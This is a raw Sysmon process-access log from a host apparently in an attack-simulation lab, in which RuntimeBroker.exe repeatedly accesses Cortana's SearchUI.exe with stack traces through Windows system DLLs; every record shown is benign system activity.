13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012838Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012837Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012836Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009 10341000x800000000000000012835Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012834Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012833Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012832Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012831Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012830Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012829Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012828Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009 10341000x800000000000000012827Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012826Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012825Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012824Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012823Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012822Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012821Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012820Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
